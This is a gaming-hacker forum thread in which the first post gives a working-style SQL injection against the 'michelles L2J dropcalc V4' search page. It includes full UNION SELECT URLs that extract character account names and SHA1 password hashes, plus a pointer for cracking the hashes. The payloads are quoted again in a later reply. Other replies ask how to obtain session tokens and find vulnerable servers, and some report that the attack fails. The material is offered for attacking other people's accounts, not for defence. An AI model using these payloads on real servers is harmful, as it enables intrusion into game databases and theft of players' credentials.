Jump to content

Recommended Posts

Posted

This concerns only The michelles L2J dropcalc V4

 

SQL Injection: !! You must be logged in, using your own username and Token !!

 

Obtain a player username with sql injection :

 

http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"

 

!! you must put the token, User and PLAYER without the "[]" !!

 

Obtain a password for that username (encrypted with SHA1) :

 

-- > !! only valid if loginserver and gameserver are in the same machine !!

http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]"

 

Then you have the password encrypted in SHA1  :)

You must decrypt it (don't worry it's easy)

Go Here --> http://md5encryption.com/

 

Now you have the password of the player  ;D

 

 

 

Posted

so on server site there must be implanted "michelles L2J dropcalculator" version 4?

 

what about [Target]/[Path]? by [Token] u mean server token?

 

oh and what about [PLAYER]?

 

ADAL13 u put it in adress at your web browser

Posted

A little bit old as it was reported at the end of January. However you provided a guide "How to" so thanks a lot for sharing.

Could you hide this post so everybody with 100 and more post will be able to see it?

 

What token do you mean? Token which allow you to play on L2 server? The same which you use to run L2Walker?

 

Thanks

 

[EDIT] PLAYER mean character name I suppose.

Posted

Token doesn't mean server token but session token. When you login in l2j Michelle dropcalc, you have a session token that's it.

Target is the link (url) of the database  ;)

Posted

how we can know if the database is michelle dropcalc?

abd how we get the session token and the url of the database?

 

i didint understand it too.. pm me too if u can

 

 

thnx

Posted

@raouf67

 

I tried it on few servers.

Always I am getting "Please give at least 3 characters." so something is wrong with this sql code. I am sure I checked servers where dropcalc is v4.

Can't check if login and game server are on the same machine but I think it is.

"[PLAYER]" means character name in game?

Posted

 

http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"

 

!! you must put the token, User and PLAYER without the "[]" !!

 

Obtain a password for that username (encrypted with SHA1) :

 

-- > !! only valid if loginserver and gameserver are in the same machine !!

http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]"

 

Then you have the password encrypted in SHA1  :)

You must decrypt it (don't worry it's easy)

Go Here --> http://md5encryption.com/

 

I have few questions:

1.Token. The same token as for l2 walkers? or from mysql sessions?

2.The michelles L2J dropcalc V4. On what l2 version is this db used c4,c5,interlude?

3.Does this work for anyone?

 

Posted

I have few questions:

1.Token. The same token as for l2 walkers? or from mysql sessions?

2.The michelles L2J dropcalc V4. On what l2 version is this db used c4,c5,interlude?

3.Does this work for anyone?

 

 

1. As raouf67 said "Token doesn't mean server token but session token. When you login in l2j Michelle dropcalc, you have a session token that's it."

2. As far I found C4 and one C5 server which are using l2j dropcalc V4

3. Not working for me as I am getting weird message ""Please give at least 3 characters.""

Guest
This topic is now closed to further replies.
  • Posts

    • You should buy it then I’ll make a discount  
    • Hi everyone,   In 2014, I completely stepped away from developing L2 servers and doing L2J-related work. Since then, I’ve only opened this server about once a year and helped a few servers and individuals for free. I haven’t taken on any paid L2J work since then.   LINEAGE2.GOLD is a project that has reached about Season 6. The first season launched at the end of 2020 and was a fully rebuilt Gold-style server on the Classic client (protocol 110). It featured many custom systems and enhancements. After several seasons, I decided to abandon the Mobius-based project and move to Lucera, as my goal was to get as close as possible to Interlude PTS behavior while still staying on the L2J platform.   The current project was once again completely rebuilt, this time on the Essence client (protocol 306), and is based on Lucera. Because of that, acquiring a license from Deazer is required.   My Lucera extender includes, but is not limited to: Formulas.java Basic anti-bot detection, which proved quite effective, we caught most Adrenaline users using relatively simple server-side logic, logged them, and took staff action. Simple admin account lookup commands based on IP, HWID, and similar identifiers. In-game Captcha via https://lineage2.gold/code, protected by Cloudflare, including admin commands for blacklisting based on aggression levels and whitelisting. Additional admin tools such as Auto-Play status checks, Enchanted Hero Weapon live sync, force add/remove clans from castle sieges, item listeners for live item monitoring, and more. A fully rewritten Auto-Play system with support for ExAutoPlaySetting, while still using the Auto-Play UI wheel, featuring: Debuff Efficiency Party Leader Assist Respectful Hunting Healer AI Target Mode Range Mode Summoner buff support Dwarf mechanics Reworked EffectDispelEffects to restore buffs after Cancellation. Raid Bomb item support. Reworked CronZoneSwitcher. Prime Time Raid Respawn Service. Community Board features such as Top rankings and RB/Epic status. Custom systems for Noblesse, Subclasses, support-class rewards, and much more.   Depending on the deal, the project can include: The lineage2.gold domain The website built on the Laravel PHP framework The server’s Discord Client Interface source Server files and extender source The server database (excluding private data such as emails and passwords)   I’m primarily looking for a serious team to continue the project, as it would be a shame to see this work abandoned. This is not cheap. You can DM me with offers. If you’re wondering why I’m doing this: I’ve felt a clear lack of appreciation from the L2 community, and I’m not interested in doing charity work for people who don’t deserve it. I’m simply not someone who tolerates BS. Server Info: https://lineage2.gold/info Server for test: https://lineage2.gold/download Over 110 videos YouTube playlist: https://www.youtube.com/watch?v=HO7BZaxUv2U&list=PLD9WZ0Nj-zstZaYeWxAxTKbX7ia2M_DUu&index=113
  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock